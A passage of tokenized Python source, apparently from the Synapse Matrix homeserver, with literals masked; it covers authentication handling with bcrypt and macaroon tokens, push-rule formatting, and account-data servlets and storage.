"<STR_LIT>" % ( host , ) <EOL> self . content_addr = content_addr <EOL> def default_config ( self , server_name , ** kwargs ) : <EOL> if "<STR_LIT::>" in server_name : <EOL> bind_port = int ( server_name . split ( "<STR_LIT::>" ) [ <NUM_LIT:1> ] ) <EOL> unsecure_port = bind_port - <NUM_LIT> <EOL> else : <EOL> bind_port = <NUM_LIT> <EOL> unsecure_port = <NUM_LIT> <EOL> pid_file = self . abspath ( "<STR_LIT>" ) <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def read_arguments ( self , args ) : <EOL> if args . manhole is not None : <EOL> self . manhole = args . manhole <EOL> if args . daemonize is not None : <EOL> self . daemonize = args . daemonize <EOL> if args . print_pidfile is not None : <EOL> self . print_pidfile = args . print_pidfile <EOL> def add_arguments ( self , parser ) : <EOL> server_group = parser . add_argument_group ( "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , "<STR_LIT>" , action = '<STR_LIT:store_true>' , <EOL> default = None , <EOL> help = "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , action = '<STR_LIT:store_true>' , <EOL> default = None , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , metavar = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = int , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> from twisted . internet import defer <EOL> from . _base import BaseHandler <EOL> from synapse . api . constants import LoginType <EOL> from synapse . types import UserID <EOL> from synapse . api . errors import AuthError , LoginError , Codes <EOL> from synapse . util . async import run_on_reactor <EOL> from twisted . web . client import PartialDownloadError <EOL> import logging <EOL> import bcrypt <EOL> import pymacaroons <EOL> import simplejson <EOL> import synapse . util . stringutils as stringutils <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AuthHandler ( BaseHandler ) : <EOL> SESSION_EXPIRE_MS = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1000> <EOL> def __init__ ( self , hs ) : <EOL> super ( AuthHandler , self ) . __init__ ( hs ) <EOL> self . checkers = { <EOL> LoginType . PASSWORD : self . _check_password_auth , <EOL> LoginType . RECAPTCHA : self . _check_recaptcha , <EOL> LoginType . EMAIL_IDENTITY : self . _check_email_identity , <EOL> LoginType . DUMMY : self . _check_dummy_auth , <EOL> } <EOL> self . bcrypt_rounds = hs . config . bcrypt_rounds <EOL> self . sessions = { } <EOL> self . INVALID_TOKEN_HTTP_STATUS = <NUM_LIT> <EOL> @ defer . inlineCallbacks <EOL> def check_auth ( self , flows , clientdict , clientip ) : <EOL> """<STR_LIT>""" <EOL> authdict = None <EOL> sid = None <EOL> if clientdict and '<STR_LIT>' in clientdict : <EOL> authdict = clientdict [ '<STR_LIT>' ] <EOL> del clientdict [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in authdict : <EOL> sid = authdict [ '<STR_LIT>' ] <EOL> session = self . _get_session_info ( sid ) <EOL> if len ( clientdict ) > <NUM_LIT:0> : <EOL> session [ '<STR_LIT>' ] = clientdict <EOL> self . _save_session ( session ) <EOL> elif '<STR_LIT>' in session : <EOL> clientdict = session [ '<STR_LIT>' ] <EOL> if not authdict : <EOL> defer . returnValue ( <EOL> ( <EOL> False , self . _auth_dict_for_flows ( flows , session ) , <EOL> clientdict , session [ '<STR_LIT:id>' ] <EOL> ) <EOL> ) <EOL> if '<STR_LIT>' not in session : <EOL> session [ '<STR_LIT>' ] = { } <EOL> creds = session [ '<STR_LIT>' ] <EOL> if '<STR_LIT:type>' in authdict : <EOL> if authdict [ '<STR_LIT:type>' ] not in self . checkers : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . UNRECOGNIZED ) <EOL> result = yield self . checkers [ authdict [ '<STR_LIT:type>' ] ] ( authdict , clientip ) <EOL> if result : <EOL> creds [ authdict [ '<STR_LIT:type>' ] ] = result <EOL> self . _save_session ( session ) <EOL> for f in flows : <EOL> if len ( set ( f ) - set ( creds . keys ( ) ) ) == <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" , creds ) <EOL> defer . returnValue ( ( True , creds , clientdict , session [ '<STR_LIT:id>' ] ) ) <EOL> ret = self . _auth_dict_for_flows ( flows , session ) <EOL> ret [ '<STR_LIT>' ] = creds . keys ( ) <EOL> defer . returnValue ( ( False , ret , clientdict , session [ '<STR_LIT:id>' ] ) ) <EOL> @ defer . inlineCallbacks <EOL> def add_oob_auth ( self , stagetype , authdict , clientip ) : <EOL> """<STR_LIT>""" <EOL> if stagetype not in self . checkers : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> if '<STR_LIT>' not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> sess = self . _get_session_info ( <EOL> authdict [ '<STR_LIT>' ] <EOL> ) <EOL> if '<STR_LIT>' not in sess : <EOL> sess [ '<STR_LIT>' ] = { } <EOL> creds = sess [ '<STR_LIT>' ] <EOL> result = yield self . checkers [ stagetype ] ( authdict , clientip ) <EOL> if result : <EOL> creds [ stagetype ] = result <EOL> self . _save_session ( sess ) <EOL> defer . returnValue ( True ) <EOL> defer . returnValue ( False ) <EOL> def get_session_id ( self , clientdict ) : <EOL> """<STR_LIT>""" <EOL> sid = None <EOL> if clientdict and '<STR_LIT>' in clientdict : <EOL> authdict = clientdict [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in authdict : <EOL> sid = authdict [ '<STR_LIT>' ] <EOL> return sid <EOL> def set_session_data ( self , session_id , key , value ) : <EOL> """<STR_LIT>""" <EOL> sess = self . _get_session_info ( session_id ) <EOL> sess . setdefault ( '<STR_LIT>' , { } ) [ key ] = value <EOL> self . _save_session ( sess ) <EOL> def get_session_data ( self , session_id , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> sess = self . _get_session_info ( session_id ) <EOL> return sess . setdefault ( '<STR_LIT>' , { } ) . get ( key , default ) <EOL> @ defer . inlineCallbacks <EOL> def _check_password_auth ( self , authdict , _ ) : <EOL> if "<STR_LIT:user>" not in authdict or "<STR_LIT:password>" not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> user_id = authdict [ "<STR_LIT:user>" ] <EOL> password = authdict [ "<STR_LIT:password>" ] <EOL> if not user_id . startswith ( '<STR_LIT:@>' ) : <EOL> user_id = UserID . create ( user_id , self . hs . hostname ) . to_string ( ) <EOL> user_id , password_hash = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> self . _check_password ( user_id , password , password_hash ) <EOL> defer . returnValue ( user_id ) <EOL> @ defer . inlineCallbacks <EOL> def _check_recaptcha ( self , authdict , clientip ) : <EOL> try : <EOL> user_response = authdict [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> raise LoginError ( <EOL> <NUM_LIT> , "<STR_LIT>" , <EOL> errcode = Codes . CAPTCHA_NEEDED <EOL> ) <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> user_response , clientip <EOL> ) <EOL> try : <EOL> client = self . hs . get_simple_http_client ( ) <EOL> resp_body = yield client . post_urlencoded_get_json ( <EOL> self . hs . config . recaptcha_siteverify_api , <EOL> args = { <EOL> '<STR_LIT>' : self . hs . config . recaptcha_private_key , <EOL> '<STR_LIT>' : user_response , <EOL> '<STR_LIT>' : clientip , <EOL> } <EOL> ) <EOL> except PartialDownloadError as pde : <EOL> data = pde . response <EOL> resp_body = simplejson . loads ( data ) <EOL> if '<STR_LIT:success>' in resp_body and resp_body [ '<STR_LIT:success>' ] : <EOL> defer . returnValue ( True ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNAUTHORIZED ) <EOL> @ defer . inlineCallbacks <EOL> def _check_email_identity ( self , authdict , _ ) : <EOL> yield run_on_reactor ( ) <EOL> if '<STR_LIT>' not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> threepid_creds = authdict [ '<STR_LIT>' ] <EOL> identity_handler = self . hs . get_handlers ( ) . identity_handler <EOL> logger . info ( "<STR_LIT>" % ( threepid_creds , ) ) <EOL> threepid = yield identity_handler . threepid_from_creds ( threepid_creds ) <EOL> if not threepid : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNAUTHORIZED ) <EOL> threepid [ '<STR_LIT>' ] = authdict [ '<STR_LIT>' ] <EOL> defer . returnValue ( threepid ) <EOL> @ defer . inlineCallbacks <EOL> def _check_dummy_auth ( self , authdict , _ ) : <EOL> yield run_on_reactor ( ) <EOL> defer . returnValue ( True ) <EOL> def _get_params_recaptcha ( self ) : <EOL> return { "<STR_LIT>" : self . hs . config . recaptcha_public_key } <EOL> def _auth_dict_for_flows ( self , flows , session ) : <EOL> public_flows = [ ] <EOL> for f in flows : <EOL> public_flows . append ( f ) <EOL> get_params = { <EOL> LoginType . RECAPTCHA : self . _get_params_recaptcha , <EOL> } <EOL> params = { } <EOL> for f in public_flows : <EOL> for stage in f : <EOL> if stage in get_params and stage not in params : <EOL> params [ stage ] = get_params [ stage ] ( ) <EOL> return { <EOL> "<STR_LIT>" : session [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : f } for f in public_flows ] , <EOL> "<STR_LIT>" : params <EOL> } <EOL> def _get_session_info ( self , session_id ) : <EOL> if session_id not in self . sessions : <EOL> session_id = None <EOL> if not session_id : <EOL> while session_id is None or session_id in self . sessions : <EOL> session_id = stringutils . random_string ( <NUM_LIT> ) <EOL> self . sessions [ session_id ] = { <EOL> "<STR_LIT:id>" : session_id , <EOL> } <EOL> return self . sessions [ session_id ] <EOL> @ defer . inlineCallbacks <EOL> def login_with_password ( self , user_id , password ) : <EOL> """<STR_LIT>""" <EOL> user_id , password_hash = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> self . _check_password ( user_id , password , password_hash ) <EOL> logger . info ( "<STR_LIT>" , user_id ) <EOL> access_token = yield self . issue_access_token ( user_id ) <EOL> refresh_token = yield self . issue_refresh_token ( user_id ) <EOL> defer . returnValue ( ( user_id , access_token , refresh_token ) ) <EOL> @ defer . inlineCallbacks <EOL> def get_login_tuple_for_user_id ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> user_id , ignored = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> logger . info ( "<STR_LIT>" , user_id ) <EOL> access_token = yield self . issue_access_token ( user_id ) <EOL> refresh_token = yield self . issue_refresh_token ( user_id ) <EOL> defer . returnValue ( ( user_id , access_token , refresh_token ) ) <EOL> @ defer . inlineCallbacks <EOL> def does_user_exist ( self , user_id ) : <EOL> try : <EOL> yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> defer . returnValue ( True ) <EOL> except LoginError : <EOL> defer . returnValue ( False ) <EOL> @ defer . inlineCallbacks <EOL> def _find_user_id_and_pwd_hash ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> user_infos = yield self . store . get_users_by_id_case_insensitive ( user_id ) <EOL> if not user_infos : <EOL> logger . warn ( "<STR_LIT>" , user_id ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> if len ( user_infos ) > <NUM_LIT:1> : <EOL> if user_id not in user_infos : <EOL> logger . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> user_id , user_infos . keys ( ) <EOL> ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> defer . returnValue ( ( user_id , user_infos [ user_id ] ) ) <EOL> else : <EOL> defer . returnValue ( user_infos . popitem ( ) ) <EOL> def _check_password ( self , user_id , password , stored_hash ) : <EOL> """<STR_LIT>""" <EOL> if not self . validate_hash ( password , stored_hash ) : <EOL> logger . warn ( "<STR_LIT>" , user_id ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> @ defer . inlineCallbacks <EOL> def issue_access_token ( self , user_id ) : <EOL> access_token = self . generate_access_token ( user_id ) <EOL> yield self . store . add_access_token_to_user ( user_id , access_token ) <EOL> defer . returnValue ( access_token ) <EOL> @ defer . inlineCallbacks <EOL> def issue_refresh_token ( self , user_id ) : <EOL> refresh_token = self . generate_refresh_token ( user_id ) <EOL> yield self . store . add_refresh_token_to_user ( user_id , refresh_token ) <EOL> defer . returnValue ( refresh_token ) <EOL> def generate_access_token ( self , user_id , extra_caveats = None ) : <EOL> extra_caveats = extra_caveats or [ ] <EOL> macaroon = self . _generate_base_macaroon ( user_id ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> expiry = now + ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1000> ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" % ( expiry , ) ) <EOL> for caveat in extra_caveats : <EOL> macaroon . add_first_party_caveat ( caveat ) <EOL> return macaroon . serialize ( ) <EOL> def generate_refresh_token ( self , user_id ) : <EOL> m = self . _generate_base_macaroon ( user_id ) <EOL> m . add_first_party_caveat ( "<STR_LIT>" ) <EOL> m . add_first_party_caveat ( "<STR_LIT>" % ( <EOL> stringutils . random_string_with_symbols ( <NUM_LIT:16> ) , <EOL> ) ) <EOL> return m . serialize ( ) <EOL> def generate_short_term_login_token ( self , user_id ) : <EOL> macaroon = self . _generate_base_macaroon ( user_id ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> expiry = now + ( <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT:1000> ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" % ( expiry , ) ) <EOL> return macaroon . serialize ( ) <EOL> def validate_short_term_login_token_and_get_user_id ( self , login_token ) : <EOL> try : <EOL> macaroon = pymacaroons . Macaroon . deserialize ( login_token ) <EOL> auth_api = self . hs . get_auth ( ) <EOL> auth_api . validate_macaroon ( macaroon , "<STR_LIT>" , True ) <EOL> return self . get_user_from_macaroon ( macaroon ) <EOL> except ( pymacaroons . exceptions . MacaroonException , TypeError , ValueError ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNKNOWN_TOKEN ) <EOL> def _generate_base_macaroon ( self , user_id ) : <EOL> macaroon = pymacaroons . Macaroon ( <EOL> location = self . hs . config . server_name , <EOL> identifier = "<STR_LIT:key>" , <EOL> key = self . hs . config . macaroon_secret_key ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" % ( user_id , ) ) <EOL> return macaroon <EOL> def get_user_from_macaroon ( self , macaroon ) : <EOL> user_prefix = "<STR_LIT>" <EOL> for caveat in macaroon . caveats : <EOL> if caveat . caveat_id . startswith ( user_prefix ) : <EOL> return caveat . caveat_id [ len ( user_prefix ) : ] <EOL> raise AuthError ( <EOL> self . INVALID_TOKEN_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def set_password ( self , user_id , newpassword , requester = None ) : <EOL> password_hash = self . hash ( newpassword ) <EOL> except_access_token_ids = [ requester . access_token_id ] if requester else [ ] <EOL> yield self . store . user_set_password_hash ( user_id , password_hash ) <EOL> yield self . store . user_delete_access_tokens ( <EOL> user_id , except_access_token_ids <EOL> ) <EOL> yield self . hs . get_pusherpool ( ) . remove_pushers_by_user ( <EOL> user_id , except_access_token_ids <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def add_threepid ( self , user_id , medium , address , validated_at ) : <EOL> yield self . store . user_add_threepid ( <EOL> user_id , medium , address , validated_at , <EOL> self . hs . get_clock ( ) . time_msec ( ) <EOL> ) <EOL> def _save_session ( self , session ) : <EOL> logger . debug ( "<STR_LIT>" , session ) <EOL> session [ "<STR_LIT>" ] = self . hs . get_clock ( ) . time_msec ( ) <EOL> self . sessions [ session [ "<STR_LIT:id>" ] ] = session <EOL> self . _prune_sessions ( ) <EOL> def _prune_sessions ( self ) : <EOL> for sid , sess in self . sessions . items ( ) : <EOL> last_used = <NUM_LIT:0> <EOL> if '<STR_LIT>' in sess : <EOL> last_used = sess [ '<STR_LIT>' ] <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> if last_used < now - AuthHandler . SESSION_EXPIRE_MS : <EOL> del self . sessions [ sid ] <EOL> def hash ( self , password ) : <EOL> """<STR_LIT>""" <EOL> return bcrypt . hashpw ( password , bcrypt . gensalt ( self . bcrypt_rounds ) ) <EOL> def validate_hash ( self , password , stored_hash ) : <EOL> """<STR_LIT>""" <EOL> return bcrypt . hashpw ( password , stored_hash ) == stored_hash </s>
<s> from synapse . push . baserules import list_with_base_rules <EOL> from synapse . push . rulekinds import ( <EOL> PRIORITY_CLASS_MAP , PRIORITY_CLASS_INVERSE_MAP <EOL> ) <EOL> import copy <EOL> import simplejson as json <EOL> def format_push_rules_for_user ( user , rawrules , enabled_map ) : <EOL> """<STR_LIT>""" <EOL> ruleslist = [ ] <EOL> for rawrule in rawrules : <EOL> rule = dict ( rawrule ) <EOL> rule [ "<STR_LIT>" ] = json . loads ( rawrule [ "<STR_LIT>" ] ) <EOL> rule [ "<STR_LIT>" ] = json . loads ( rawrule [ "<STR_LIT>" ] ) <EOL> ruleslist . append ( rule ) <EOL> ruleslist = copy . deepcopy ( list_with_base_rules ( ruleslist ) ) <EOL> rules = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> rules [ '<STR_LIT>' ] = _add_empty_priority_class_arrays ( rules [ '<STR_LIT>' ] ) <EOL> for r in ruleslist : <EOL> rulearray = None <EOL> template_name = _priority_class_to_template_name ( r [ '<STR_LIT>' ] ) <EOL> for c in r [ "<STR_LIT>" ] : <EOL> c . pop ( "<STR_LIT>" , None ) <EOL> pattern_type = c . pop ( "<STR_LIT>" , None ) <EOL> if pattern_type == "<STR_LIT>" : <EOL> c [ "<STR_LIT>" ] = user . to_string ( ) <EOL> elif pattern_type == "<STR_LIT>" : <EOL> c [ "<STR_LIT>" ] = user . localpart <EOL> rulearray = rules [ '<STR_LIT>' ] [ template_name ] <EOL> template_rule = _rule_to_template ( r ) <EOL> if template_rule : <EOL> if r [ '<STR_LIT>' ] in enabled_map : <EOL> template_rule [ '<STR_LIT>' ] = enabled_map [ r [ '<STR_LIT>' ] ] <EOL> elif '<STR_LIT>' in r : <EOL> template_rule [ '<STR_LIT>' ] = r [ '<STR_LIT>' ] <EOL> else : <EOL> template_rule [ '<STR_LIT>' ] = True <EOL> rulearray . append ( template_rule ) <EOL> return rules <EOL> def _add_empty_priority_class_arrays ( d ) : <EOL> for pc in PRIORITY_CLASS_MAP . keys ( ) : <EOL> d [ pc ] = [ ] <EOL> return d <EOL> def _rule_to_template ( rule ) : <EOL> unscoped_rule_id = None <EOL> if '<STR_LIT>' in rule : <EOL> unscoped_rule_id = _rule_id_from_namespaced ( rule [ '<STR_LIT>' ] ) <EOL> template_name = _priority_class_to_template_name ( rule [ '<STR_LIT>' ] ) <EOL> if template_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> templaterule = { k : rule [ k ] for k in [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> elif template_name in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> templaterule = { '<STR_LIT>' : rule [ '<STR_LIT>' ] } <EOL> unscoped_rule_id = rule [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> elif template_name == '<STR_LIT:content>' : <EOL> if len ( rule [ "<STR_LIT>" ] ) != <NUM_LIT:1> : <EOL> return None <EOL> thecond = rule [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if "<STR_LIT>" not in thecond : <EOL> return None <EOL> templaterule = { '<STR_LIT>' : rule [ '<STR_LIT>' ] } <EOL> templaterule [ "<STR_LIT>" ] = thecond [ "<STR_LIT>" ] <EOL> if unscoped_rule_id : <EOL> templaterule [ '<STR_LIT>' ] = unscoped_rule_id <EOL> if '<STR_LIT:default>' in rule : <EOL> templaterule [ '<STR_LIT:default>' ] = rule [ '<STR_LIT:default>' ] <EOL> return templaterule <EOL> def _rule_id_from_namespaced ( in_rule_id ) : <EOL> return in_rule_id . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> def _priority_class_to_template_name ( pc ) : <EOL> return PRIORITY_CLASS_INVERSE_MAP [ pc ] </s>
<s> from . _base import client_v2_patterns <EOL> from synapse . http . servlet import RestServlet , parse_json_object_from_request <EOL> from synapse . api . errors import AuthError <EOL> from twisted . internet import defer <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AccountDataServlet ( RestServlet ) : <EOL> """<STR_LIT>""" <EOL> PATTERNS = client_v2_patterns ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , hs ) : <EOL> super ( AccountDataServlet , self ) . __init__ ( ) <EOL> self . auth = hs . get_auth ( ) <EOL> self . store = hs . get_datastore ( ) <EOL> self . notifier = hs . get_notifier ( ) <EOL> @ defer . inlineCallbacks <EOL> def on_PUT ( self , request , user_id , account_data_type ) : <EOL> requester = yield self . auth . get_user_by_req ( request ) <EOL> if user_id != requester . user . to_string ( ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> body = parse_json_object_from_request ( request ) <EOL> max_id = yield self . store . add_account_data_for_user ( <EOL> user_id , account_data_type , body <EOL> ) <EOL> self . notifier . on_new_event ( <EOL> "<STR_LIT>" , max_id , users = [ user_id ] <EOL> ) <EOL> defer . returnValue ( ( <NUM_LIT:200> , { } ) ) <EOL> class RoomAccountDataServlet ( RestServlet ) : <EOL> """<STR_LIT>""" <EOL> PATTERNS = client_v2_patterns ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , hs ) : <EOL> super ( RoomAccountDataServlet , self ) . __init__ ( ) <EOL> self . auth = hs . get_auth ( ) <EOL> self . store = hs . get_datastore ( ) <EOL> self . notifier = hs . get_notifier ( ) <EOL> @ defer . inlineCallbacks <EOL> def on_PUT ( self , request , user_id , room_id , account_data_type ) : <EOL> requester = yield self . auth . get_user_by_req ( request ) <EOL> if user_id != requester . user . to_string ( ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> body = parse_json_object_from_request ( request ) <EOL> max_id = yield self . store . add_account_data_to_room ( <EOL> user_id , room_id , account_data_type , body <EOL> ) <EOL> self . notifier . on_new_event ( <EOL> "<STR_LIT>" , max_id , users = [ user_id ] <EOL> ) <EOL> defer . returnValue ( ( <NUM_LIT:200> , { } ) ) <EOL> def register_servlets ( hs , http_server ) : <EOL> AccountDataServlet ( hs ) . register ( http_server ) <EOL> RoomAccountDataServlet ( hs ) . register ( http_server ) </s>
<s> from . _base import SQLBaseStore <EOL> from twisted . internet import defer <EOL> import ujson as json <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AccountDataStore ( SQLBaseStore ) : <EOL> def get_account_data_for_user ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> def get_account_data_for_user_txn ( txn ) : <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> global_account_data = { <EOL> row [ "<STR_LIT>" ] : json . loads ( row [ "<STR_LIT:content>" ] ) for row in rows <EOL> } <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> by_room = { } <EOL> for row in rows : <EOL> room_data = by_room . setdefault ( row [ "<STR_LIT>" ] , { } ) <EOL> room_data [ row [ "<STR_LIT>" ] ] = json . loads ( row [ "<STR_LIT:content>" ] ) <EOL> return ( global_account_data , by_room ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_account_data_for_user_txn <EOL> ) <EOL> def get_account_data_for_room ( self , user_id , room_id ) : <EOL> """<STR_LIT>""" <EOL> def get_account_data_for_room_txn ( txn ) : <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id , "<STR_LIT>" : room_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> return { <EOL> row [ "<STR_LIT>" ] : json . loads ( row [ "<STR_LIT:content>" ] ) for row in rows <EOL> } <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_account_data_for_room_txn <EOL> ) <EOL> def get_all_updated_account_data ( self , last_global_id , last_room_id , <EOL> current_id , limit ) : <EOL> """<STR_LIT>""" <EOL> def get_updated_account_data_txn ( txn ) : <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( last_global_id , current_id , limit ) ) <EOL> global_results = txn . fetchall ( ) <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( last_room_id , current_id , limit ) ) <EOL> room_results = txn . fetchall ( ) <EOL> return ( global_results , room_results ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_updated_account_data_txn <EOL> ) <EOL> def get_updated_account_data_for_user ( self , user_id , stream_id ) : <EOL> """<STR_LIT>""" <EOL> def get_updated_account_data_for_user_txn ( txn ) : <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( user_id , stream_id ) ) <EOL> global_account_data = { <EOL> row [ <NUM_LIT:0> ] : json . loads ( row [ <NUM_LIT:1> ] ) for row in txn . fetchall ( ) <EOL> } <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( user_id , stream_id ) ) <EOL> account_data_by_room = { } <EOL> for row in txn . fetchall ( ) : <EOL> room_account_data = account_data_by_room . setdefault ( row [ <NUM_LIT:0> ] , { } ) <EOL> room_account_data [ row [ <NUM_LIT:1> ] ] = json . loads ( row [ <NUM_LIT:2> ] ) <EOL> return ( global_account_data , account_data_by_room ) <EOL> changed = self . _account_data_stream_cache . has_entity_changed ( <EOL> user_id , int ( stream_id ) <EOL> ) <EOL> if not changed : <EOL> return ( { } , { } ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_updated_account_data_for_user_txn <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def add_account_data_to_room ( self , user_id , room_id , account_data_type , content ) : <EOL> """<STR_LIT>""" <EOL> content_json = json . dumps ( content ) <EOL> def add_account_data_txn ( txn , next_id ) : <EOL> self . _simple_upsert_txn ( <EOL> txn , <EOL> table = "<STR_LIT>" , <EOL> keyvalues = { <EOL> "<STR_LIT>" : user_id , <EOL> "<STR_LIT>" : room_id , <EOL> "<STR_LIT>" : account_data_type , <EOL> } , <EOL> values = { <EOL> "<STR_LIT>" : next_id , <EOL> "<STR_LIT:content>" : content_json , <EOL> } <EOL> ) <EOL> txn . call_after ( <EOL> self . _account_data_stream_cache . entity_has_changed , <EOL> user_id , next_id , <EOL> ) <EOL> self . _update_max_stream_id ( txn , next_id ) <EOL> with self . _account_data_id_gen . get_next ( ) as next_id : <EOL> yield self . runInteraction ( <EOL> "<STR_LIT>" , add_account_data_txn , next_id <EOL> ) <EOL> result = self . _account_data_id_gen . get_max_token ( ) <EOL> defer . returnValue ( result ) <EOL> @ defer . inlineCallbacks <EOL> def add_account_data_for_user ( self , user_id , account_data_type , content ) : <EOL> """<STR_LIT>""" <EOL> content_json = json . dumps ( content ) <EOL> def add_account_data_txn ( txn , next_id ) : <EOL> self . _simple_upsert_txn ( <EOL> txn , <EOL> table = "<STR_LIT>" , <EOL> keyvalues = { <EOL> "<STR_LIT>" : user_id , <EOL> "<STR_LIT>" : account_data_type , <EOL> } , <EOL> values = { <EOL> "<STR_LIT>" : next_id , <EOL> "<STR_LIT:content>" : content_json , <EOL> } <EOL> ) <EOL> txn . call_after ( <EOL> self . _account_data_stream_cache . entity_has_changed , <EOL> user_id , next_id , <EOL> ) <EOL> self . _update_max_stream_id ( txn , next_id ) <EOL> with self . _account_data_id_gen . get_next ( ) as next_id : <EOL> yield self . runInteraction ( <EOL> "<STR_LIT>" , add_account_data_txn , next_id <EOL> ) <EOL> result = self . _account_data_id_gen . get_max_token ( ) <EOL> defer . returnValue ( result ) <EOL> def _update_max_stream_id ( self , txn , next_id ) : <EOL> """<STR_LIT>""" <EOL> update_max_id_sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( update_max_id_sql , ( next_id , next_id ) ) </s>
